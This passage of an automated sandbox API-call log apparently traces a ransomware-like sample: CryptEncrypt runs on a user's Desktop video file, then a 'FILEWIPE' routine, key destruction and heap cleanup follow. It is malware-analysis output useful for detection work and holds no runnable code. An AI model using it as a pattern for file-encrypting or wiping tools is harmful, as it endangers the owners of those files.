hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0161.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0161.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0161.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0161.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0161.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0161.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0161.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0161.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0161.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0161.498] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0161.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0161.498] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0161.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0161.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0161.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0161.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0161.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0161.499] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0161.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0161.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0161.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0161.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0161.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0161.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0161.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0161.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0161.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0161.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0161.499] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0161.499] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.499] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.499] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.499] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.499] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.499] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.499] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0161.499] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0161.499] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0161.499] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0161.499] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0161.499] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0161.499] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0161.499] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0161.500] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0161.500] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0161.500] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.500] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.500] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.500] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.500] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0161.500] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0161.501] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.501] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x18b40, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x18b50) returned 1 [0161.501] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.501] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.501] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.501] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.501] CharLowerBuffW (in: lpsz="byte[101201]", cchLength=0xc | out: lpsz="byte[101201]") returned 0xc [0161.501] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.503] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.503] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0161.503] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0161.503] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.503] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa16820*, pdwDataLen=0x87e820*=0x18b40, dwBufLen=0x18b50 | out: pbData=0xa16820*, pdwDataLen=0x87e820*=0x18b50) returned 1 [0161.504] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.504] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.504] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.504] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.504] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.504] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.504] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0161.504] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0161.531] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0161.531] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0161.531] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0161.531] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0161.531] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0161.531] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0161.531] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0161.531] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0161.531] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.537] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.537] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.537] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.541] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.541] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.541] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0161.541] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0161.541] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0161.541] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0161.541] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.541] CryptDestroyKey (hKey=0x90af98) returned 1 [0161.542] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0161.542] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0161.542] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0161.542] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0161.542] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0161.542] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0161.542] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0161.542] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0161.542] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0161.542] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0161.542] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0161.542] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0161.542] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0161.542] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0161.542] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.542] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0161.542] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.542] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0161.542] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0161.543] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0161.543] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.543] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0161.543] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0161.543] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.543] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0161.543] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0161.543] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0161.543] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0161.543] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.543] CryptReleaseContext (hProv=0x9c0b78, dwFlags=0x0) returned 1 [0161.543] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.543] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0161.543] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0161.543] FreeLibrary (hLibModule=0x74f20000) returned 1 [0161.543] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.543] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.543] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.545] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.546] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.546] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0161.546] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0161.546] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.548] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.548] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gV7qJagBY9A.mkv", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x42ecd740, ftCreationTime.dwHighDateTime=0x1d5e024, ftLastAccessTime.dwLowDateTime=0x92721dc0, ftLastAccessTime.dwHighDateTime=0x1d5e470, ftLastWriteTime.dwLowDateTime=0x92721dc0, ftLastWriteTime.dwHighDateTime=0x1d5e470, nFileSizeHigh=0x0, nFileSizeLow=0x18b40, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="gV7qJagBY9A.mkv", cAlternateFileName="GV7QJA~1.MKV")) returned 0x90af58 [0161.549] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0161.549] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.549] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0161.549] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0161.549] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0161.549] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0161.549] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0161.549] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0161.550] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0161.550] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0161.550] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0161.550] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0161.550] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0161.550] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0161.550] CharLowerBuffW (in: lpsz="byte[101184]", cchLength=0xc | out: lpsz="byte[101184]") returned 0xc [0161.550] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc1c8 [0161.550] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0161.550] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0161.550] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0161.550] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0161.550] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0161.550] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0161.550] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0161.551] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0161.552] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.552] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0161.552] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0161.552] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0161.552] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.552] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0161.552] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0161.552] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0161.552] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0161.553] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0161.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0161.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0161.553] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0161.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0161.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0161.553] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0161.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7) returned 0x9c28e8 [0161.553] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x9c28e8, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 